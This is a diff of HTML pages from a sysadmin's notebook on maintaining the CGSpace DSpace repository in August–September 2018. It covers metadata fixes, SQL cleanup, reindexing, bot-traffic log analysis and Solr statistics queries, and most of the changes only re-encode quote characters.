&#34;Schultze-Kraft, R.&#34;,Rainer Schultze-Kraft: 0000-0002-4563-0044
&#34;Verchot, Louis&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, L&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, L. V.&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, L.V&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, L.V.&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, LV&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, Louis V.&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Mukankusi, Clare&#34;,Clare Mukankusi: 0000-0001-7837-4545
&#34;Mukankusi, Clare M.&#34;,Clare Mukankusi: 0000-0001-7837-4545
&#34;Wyckhuys, Kris&#34;,Kris Wyckhuys: 0000-0003-0922-488X
&#34;Wyckhuys, Kris A. G.&#34;,Kris Wyckhuys: 0000-0003-0922-488X
&#34;Wyckhuys, Kris A.G.&#34;,Kris Wyckhuys: 0000-0003-0922-488X
&#34;Chirinda, Ngonidzashe&#34;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&#34;Chirinda, Ngoni&#34;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&#34;Ngonidzashe, Chirinda&#34;,Ngonidzashe Chirinda: 0000-0002-4213-6294
</code></pre><ul>
<li>The invocation would be:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>I ran the script on DSpace Test and CGSpace and tagged a total of 986 ORCID identifiers</li>
<li>Looking at the list of author affialitions from Peter one last time</li>
@ -268,12 +268,12 @@ Verchot, Louis V.
<li>This character all by itself is indicative of encoding issues in French, Italian, and Spanish names, for example: De´veloppement and Investigacio´n</li>
<li>I will run the following on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><ul>
<li>Then force an update of the Discovery index on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 72m12.570s
@ -282,7 +282,7 @@ sys 2m2.461s
</code></pre><ul>
<li>And then on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 79m44.392s
@ -292,9 +292,9 @@ sys 2m20.248s
<li>Run system updates on DSpace Test and reboot the server</li>
<li>In unrelated news, I see some newish Russian bot making a few thousand requests per day and not re-using its XMLUI session:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep '19/Aug/2018' | grep -c 5.9.6.51
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;19/Aug/2018&#39; | grep -c 5.9.6.51
1553
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-08-19
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-08-19
1724
</code></pre><ul>
<li>I don&rsquo;t even know how its possible for the bot to use MORE sessions than total requests&hellip;</li>
@ -391,11 +391,11 @@ $ dspace database migrate ignored
<li>I exported a list of items from Listings and Reports with the following criteria: from year 2013 until now, have WLE subject <code>GENDER</code> or <code>GENDER POVERTY AND INSTITUTIONS</code>, and CRP <code>Water, Land and Ecosystems</code></li>
<li>Then I extracted the Handle links from the report so I could export each item&rsquo;s metadata as CSV</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E &quot;[0-9]{5}/[0-9]{0,5}&quot; listings-export.txt &gt; /tmp/iwmi-gender-items.txt
<pre tabindex="0"><code>$ grep -o -E &#34;[0-9]{5}/[0-9]{0,5}&#34; listings-export.txt &gt; /tmp/iwmi-gender-items.txt
</code></pre><ul>
<li>Then on the DSpace server I exported the metadata for each item one by one:</li>
</ul>
<pre tabindex="0"><code>$ while read -r line; do dspace metadata-export -f &quot;/tmp/${line/\//-}.csv&quot; -i $line; sleep 2; done &lt; /tmp/iwmi-gender-items.txt
<pre tabindex="0"><code>$ while read -r line; do dspace metadata-export -f &#34;/tmp/${line/\//-}.csv&#34; -i $line; sleep 2; done &lt; /tmp/iwmi-gender-items.txt
</code></pre><ul>
<li>But from here I realized that each of the fifty-nine items will have different columns in their CSVs, making it difficult to combine them</li>
<li>I&rsquo;m not sure how to proceed without writing some script to parse and join the CSVs, and I don&rsquo;t think it&rsquo;s worth my time</li>

View File

@ -30,7 +30,7 @@ I&rsquo;ll update the DSpace role in our Ansible infrastructure playbooks and ru
Also, I&rsquo;ll re-run the postgresql tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month
I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -124,7 +124,7 @@ I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
<li>I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:</li>
</ul>
<pre tabindex="0"><code>02-Sep-2018 11:18:52.678 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4776)
at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5240)
@ -139,7 +139,7 @@ I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations:
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations:
</code></pre><ul>
<li>Full log here: <a href="https://gist.github.com/alanorth/1e4ae567b853fea9d9dbf1a030ecd8c2">https://gist.github.com/alanorth/1e4ae567b853fea9d9dbf1a030ecd8c2</a></li>
<li>XMLUI fails to load, but the REST, SOLR, JSPUI, etc work</li>
@ -191,13 +191,13 @@ requests:
method: GET
url: https://dspacetest.cgiar.org/rest/test
validate:
raw: &quot;REST api is running.&quot;
raw: &#34;REST api is running.&#34;
login:
url: https://dspacetest.cgiar.org/rest/login
method: POST
data:
json: {&quot;email&quot;:&quot;test@dspace&quot;,&quot;password&quot;:&quot;thepass&quot;}
json: {&#34;email&#34;:&#34;test@dspace&#34;,&#34;password&#34;:&#34;thepass&#34;}
status:
url: https://dspacetest.cgiar.org/rest/status
@ -229,15 +229,15 @@ $ dspace community-filiator --set -p 10568/97114 -c 10568/3112
</code></pre><ul>
<li>Valerio contacted me to point out some issues with metadata on CGSpace, which I corrected in PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI Juornal';
<pre tabindex="0"><code>update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;ISI Juornal&#39;;
UPDATE 1
update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI journal';
update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;ISI journal&#39;;
UPDATE 23
update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='YES';
update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;YES&#39;;
UPDATE 1
delete from metadatavalue where resource_type_id=2 and metadata_field_id=226 and text_value='NO';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;NO&#39;;
DELETE 17
update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI';
update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;ISI&#39;;
UPDATE 15
</code></pre><ul>
<li>Start working on adding metadata for access and usage rights that we started earlier in 2018 (and also in 2017)</li>
@ -246,7 +246,7 @@ UPDATE 15
<li>Linode said that CGSpace (linode18) had a high CPU load earlier today</li>
<li>When I looked, I see it&rsquo;s the same Russian IP that I noticed last month:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;10/Sep/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Sep/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1459 157.55.39.202
1579 95.108.181.88
1615 157.55.39.147
@ -260,7 +260,7 @@ UPDATE 15
</code></pre><ul>
<li>And this bot is still creating more Tomcat sessions than Nginx requests (WTF?):</li>
</ul>
<pre tabindex="0"><code># grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-09-10
<pre tabindex="0"><code># grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-09-10
14133
</code></pre><ul>
<li>The user agent is still the same:</li>
@ -270,7 +270,7 @@ UPDATE 15
<li>I added <code>.*crawl.*</code> to the Tomcat Session Crawler Manager Valve, so I&rsquo;m not sure why the bot is creating so many sessions&hellip;</li>
<li>I just tested that user agent on CGSpace and it <em>does not</em> create a new session:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'
<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#39;
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
@ -319,7 +319,7 @@ $ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e
<li>Linode says that CGSpace (linode18) has had high CPU for the past two hours</li>
<li>The top IP addresses today are:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &quot;13/Sep/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;13/Sep/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
32 46.229.161.131
38 104.198.9.108
39 66.249.64.91
@ -333,9 +333,9 @@ $ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e
</code></pre><ul>
<li>And the top two addresses seem to be re-using their Tomcat sessions properly:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92' dspace.log.2018-09-13 | sort | uniq
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92&#39; dspace.log.2018-09-13 | sort | uniq
7
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-13 | sort | uniq
$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77&#39; dspace.log.2018-09-13 | sort | uniq
2
</code></pre><ul>
<li>So I&rsquo;m not sure what&rsquo;s going on</li>
@ -397,12 +397,12 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>There are some example queries on the <a href="https://wiki.lyrasis.org/display/DSPACE/Solr">DSpace Solr wiki</a></li>
<li>For example, this query returns 1655 rows for item <a href="https://cgspace.cgiar.org/handle/10568/10630">10568/10630</a>:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&#39;
</code></pre><ul>
<li>The id in the Solr query is the item&rsquo;s database id (get it from the REST API or something)</li>
<li>Next, I adopted a query to get the downloads and it shows 889, which is similar to the number Atmire&rsquo;s statlet shows, though the query logic here is confusing:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)&#39;
</code></pre><ul>
<li>According to the <a href="https://wiki.apache.org/solr/SolrQuerySyntax">SolrQuerySyntax</a> page on the Apache wiki, the <code>[* TO *]</code> syntax just selects a range (in this case all values for a field)</li>
<li>So it seems to be:
@ -413,15 +413,15 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
</li>
<li>What the shit, I think I&rsquo;m right: the simplified logic in <em>this</em> query returns the same 889:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)&#39;
</code></pre><ul>
<li>And if I simplify the <code>statistics_type</code> logic the same way, it still returns the same 889!</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=statistics_type:view'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=statistics_type:view&#39;
</code></pre><ul>
<li>As for item views, I suppose that&rsquo;s just the same query, minus the <code>bundleName:ORIGINAL</code>:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-bundleName:ORIGINAL&amp;fq=statistics_type:view'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-bundleName:ORIGINAL&amp;fq=statistics_type:view&#39;
</code></pre><ul>
<li>That one returns 766, which is exactly 1655 minus 889&hellip;</li>
<li>Also, Solr&rsquo;s <code>fq</code> is similar to the regular <code>q</code> query parameter, but it is considered for the Solr query cache so it should be faster for multiple queries</li>
@ -432,11 +432,11 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>It uses the Python-based <a href="https://falcon.readthedocs.io">Falcon</a> web framework and talks to Solr directly using the <a href="https://github.com/moonlitesolutions/SolrClient">SolrClient</a> library (which seems to have issues in Python 3.7 currently)</li>
<li>After deploying on DSpace Test I can then get the stats for an item using its ID:</li>
</ul>
<pre tabindex="0"><code>$ http -b 'https://dspacetest.cgiar.org/rest/statistics/item?id=110988'
<pre tabindex="0"><code>$ http -b &#39;https://dspacetest.cgiar.org/rest/statistics/item?id=110988&#39;
{
&quot;downloads&quot;: 2,
&quot;id&quot;: 110988,
&quot;views&quot;: 15
&#34;downloads&#34;: 2,
&#34;id&#34;: 110988,
&#34;views&#34;: 15
}
</code></pre><ul>
<li>The numbers are different than those that come from Atmire&rsquo;s statlets for some reason, but as I&rsquo;m querying Solr directly, I have no idea where their numbers come from!</li>
@ -533,7 +533,7 @@ sqlite&gt; INSERT INTO items(id, views) VALUES(0, 7) ON CONFLICT(id) DO UPDATE S
<pre tabindex="0"><code># python3
Python 3.5.2 (default, Nov 23 2017, 16:37:01)
[GCC 5.4.0 20160609] on linux
Type &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.
Type &#34;help&#34;, &#34;copyright&#34;, &#34;credits&#34; or &#34;license&#34; for more information.
&gt;&gt;&gt; import sqlite3
&gt;&gt;&gt; print(sqlite3.sqlite_version)
3.24.0
@ -606,7 +606,7 @@ Indexing item downloads (page 260 of 260)
<li>I will have to keep an eye on that over the next few weeks to see if things stay as they are</li>
<li>I did a batch replacement of the access rights with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.status -t correct -m 206
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.identifier.status -t correct -m 206
</code></pre><ul>
<li>This changes &ldquo;Open Access&rdquo; to &ldquo;Unrestricted Access&rdquo; and &ldquo;Limited Access&rdquo; to &ldquo;Restricted Access&rdquo;</li>
<li>After that I did a full Discovery reindex:</li>
@ -629,7 +629,7 @@ sys 2m18.485s
<li>Linode emailed to say that CGSpace&rsquo;s (linode19) CPU load was high for a few hours last night</li>
<li>Looking in the nginx logs around that time I see some new IPs that look like they are harvesting things:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;26/Sep/2018:(19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;26/Sep/2018:(19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
295 34.218.226.147
296 66.249.64.95
350 157.55.39.185
@ -645,9 +645,9 @@ sys 2m18.485s
<li><code>68.6.87.12</code> is on Cox Communications in the US (?)</li>
<li>These hosts are not using proper user agents and are not re-using their Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-09-26 | sort | uniq
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-09-26 | sort | uniq
5423
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26 | sort | uniq
$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12&#39; dspace.log.2018-09-26 | sort | uniq
758
</code></pre><ul>
<li>I will add their IPs to the list of bad bots in nginx so we can add a &ldquo;bot&rdquo; user agent to them and let Tomcat&rsquo;s Crawler Session Manager Valve handle them</li>
@ -659,8 +659,8 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26
<li>Peter sent me a list of 43 author names to fix, but it had some encoding errors like <code>Belalcázar, John</code> like usual (I will tell him to stop trying to export as UTF-8 because it never seems to work)</li>
<li>I did batch replaces for both on CGSpace with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
</code></pre><ul>
<li>Afterwards I started a full Discovery re-index:</li>
</ul>
@ -675,18 +675,18 @@ $ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p
<li>Valerio keeps sending items on CGSpace that have weird or incorrect languages, authors, etc</li>
<li>I think I should just batch export and update all languages&hellip;</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
</code></pre><ul>
<li>Then I can simply delete the &ldquo;Other&rdquo; and &ldquo;other&rdquo; ones because that&rsquo;s not useful at all:</li>
</ul>
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Other';
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;Other&#39;;
DELETE 6
dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='other';
dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;other&#39;;
DELETE 79
</code></pre><ul>
<li>Looking through the list I see some weird language codes like <code>gh</code>, so I checked out those items:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
resource_id
-------------
94530
@ -699,12 +699,12 @@ dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2
</code></pre><ul>
